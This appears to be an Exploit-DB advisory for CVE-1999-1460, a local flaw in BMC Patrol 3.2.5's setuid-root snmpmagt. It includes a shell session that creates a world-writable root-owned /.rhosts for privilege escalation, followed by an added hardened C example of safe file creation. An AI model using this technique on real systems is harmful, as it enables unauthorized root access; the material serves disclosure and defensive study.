- 18 Dec 2022
- EDB-ID: 19422
- EDB Verified: Passed
- Author: ANDREW ALNESS
- Vulnerability type: LOCAL
- Platform: LINUX
- CVE: CVE-1999-1460
- Published: 1999-07-14
BMC Software Patrol 3.2.5 - Patrol SNMP Agent File Creation/Permission
Code:
source: https://www.securityfocus.com/bid/525/info
Patrol 3.2, installed out of the box, allows a local root compromise or denial of service. The vulnerability lies in snmpmagt creating a file that is owned by the owner of the file's parent directory and is possibly world-writable. A local user can specify any file (e.g. /.rhosts) and have it created with permissions set according to the user's umask.
maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> ls -al snmpmagt
-rwsr-xr-x 1 root users 185461 Mar 6 1998 snmpmagt*
maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> ls -al /.rhosts
/.rhosts not found
maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> umask 0
maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> snmpmagt yoyoyo /.rhosts
yoyoyo: No such file or directory
snmp bind failure: Address already in use
/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin/snmpmagt: error processing configuration
maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> ls -al /.rhosts
-rw-rw-rw- 1 root users 770 Jul 13 14:42 .rhosts
Note: If the file exists, it keeps the same perms and is overwritten
with "i^A", then the result of gethostname() and some whitespace. This
problem is not platform dependent and was tested on an out-of-the-box
install on an HP.
- Source: www.exploit-db.com
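The file-creation step described above, in hardened form, as an added example (not code from the advisory or from BMC): a setuid-root program drops to the invoking user's IDs before opening a user-supplied path, refuses existing files and symlinks, and sets the mode itself instead of inheriting the umask. The function name `create_output_as_invoker` is hypothetical.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical helper (not Patrol code): create a file named by the invoking
 * user from inside a setuid-root program. Returns an open fd, or -1 with
 * errno set. */
int create_output_as_invoker(const char *path)
{
    uid_t saved_euid = geteuid();
    gid_t saved_egid = getegid();
    int fd, err;

    /* Drop the group first (needs the privileged euid), then the user, so the
     * kernel checks the path against the real user's rights, not root's. */
    if (setegid(getgid()) != 0)
        return -1;
    if (seteuid(getuid()) != 0) {
        err = errno;
        setegid(saved_egid);
        errno = err;
        return -1;
    }

    /* O_EXCL: never reuse or overwrite an existing file.
     * O_NOFOLLOW: refuse a symlink as the final path component. */
    fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    err = (fd < 0) ? errno : 0;

    /* The umask can only clear bits; set the intended mode explicitly so the
     * result does not depend on the caller's umask at all. */
    if (fd >= 0 && fchmod(fd, 0600) != 0) {
        err = errno;
        close(fd);
        unlink(path);
        fd = -1;
    }

    /* Restore privileges in reverse order; fail closed if that is refused. */
    if (seteuid(saved_euid) != 0 || setegid(saved_egid) != 0) {
        if (fd >= 0)
            close(fd);
        return -1;
    }
    errno = err;
    return fd;
}
```

With the effective IDs dropped, an unprivileged caller asking for `/.rhosts` gets `EACCES` from the kernel, and a file created elsewhere is owned by the caller rather than by root.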